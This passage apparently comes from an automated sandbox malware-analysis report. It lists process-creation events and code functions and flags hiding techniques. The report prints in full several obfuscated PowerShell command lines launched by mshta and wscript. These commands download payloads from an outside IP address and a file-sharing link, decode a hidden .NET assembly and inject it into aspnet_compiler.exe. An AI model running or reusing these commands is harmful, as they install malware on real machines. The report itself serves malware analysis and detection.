ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07DE1208 pushad ; iretd 1_2_07DE1209
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07DE023E pushad ; iretd 1_2_07DE023F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07DE022C pushad ; iretd 1_2_07DE0236
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07DE11F6 pushad ; iretd 1_2_07DE1200
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07DE11BC push eax; iretd 1_2_07DE11BD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07DE11B3 push eax; iretd 1_2_07DE11B4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00E7558A push eax; iretd 3_2_00E75699
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_073F0B1A push eax; iretd 3_2_073F0B1B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_073F0B0F push eax; iretd 3_2_073F0B10
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_073F0DBE push eax; iretd 3_2_073F0DBF
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_073F0DC9 push eax; iretd 3_2_073F0DCA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04D03E95 pushfd ; iretd 10_2_04D03EB9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041E922 push es; retf 13_2_0041E926
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004032D0 push eax; ret 13_2_004032D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00418330 pushfd ; retf 13_2_00418334
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00401BD8 pushad ; ret 13_2_00401BDC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004163F3 push edi; retf 13_2_004164AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00416390 push cs; iretd 13_2_004163C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00416393 push cs; iretd 13_2_004163C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00404C4C push ebx; retf 13_2_00404CDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00416453 push edi; retf 13_2_004164AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00404C65 push ebx; retf 13_2_00404CDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00416438 push edi; retf 13_2_004164AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00414616 push ebp; ret 13_2_00414631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00414623 push ebp; ret 13_2_00414631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00418E31 push FFFFFFF1h; ret 13_2_00418E3C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041E6A0 pushfd ; ret 13_2_0041E6C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041EF45 push edi; retf 13_2_0041EF5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041EF53 push edi; retf 13_2_0041EF5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040CFAF push esp; retf 13_2_0040CFB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011109AD push ecx; mov dword ptr [esp], ecx13_2_011109B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
